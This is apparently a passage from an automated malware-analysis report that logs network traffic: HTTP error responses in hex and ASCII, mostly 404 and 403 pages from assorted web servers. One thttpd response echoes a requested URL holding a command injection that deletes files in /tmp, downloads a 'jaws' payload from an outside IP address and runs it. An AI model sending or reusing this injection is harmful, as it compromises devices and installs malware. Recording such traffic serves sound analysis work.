6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:56 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 01 Nov 2021 09:08:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 166Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=UTF-8Date: Sat, 17 Oct 2015 00:24:01 GMTLast-Modified: Sat, 17 Oct 2015 00:24:01 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 72 65 73 6f 6c 76 65 73 20 74 6f 20 61 20 66 69 6c 65 20 70 6c 75 73 20 43 47 49 2d 73 74 79 6c 65 20 70 61 74 68 69 6e 66 6f 2c 20 62 75 74 20 74 68 65 20 66 69 6c 65 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 43 47 49 20 66 69 6c 65 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>403 Forbidden</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' resolves to a file plus CGI-style pathinfo, but the file is not a valid CGI file.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:00 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Mon, 25 Oct 2021 11:08:54 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 16:15:57 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:09:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:09:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 01 Nov 2021 09:09:01 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcontent-length: 86cache-control: no-cacheData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><body><h1>404 Not Found</h1>The requested URL was not found.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:02 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:04 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:07 GMTContent-Length: 1238Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 6b 73 5f 63 5f 35 36 30 31 2d 31 39 38 37 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 c6 c4 c0 cf 20 b6 c7 b4 c2 20 b5 f0 b7 ba c5 cd b8 ae b8 a6 20 c3 a3 c0 bb 20 bc f6 20 be f8 bd c0 b4 cf b4 d9 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 01 Nov 2021 09:09:09 GMTServer: LiteSpeedData Raw: 32 37 36 36 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 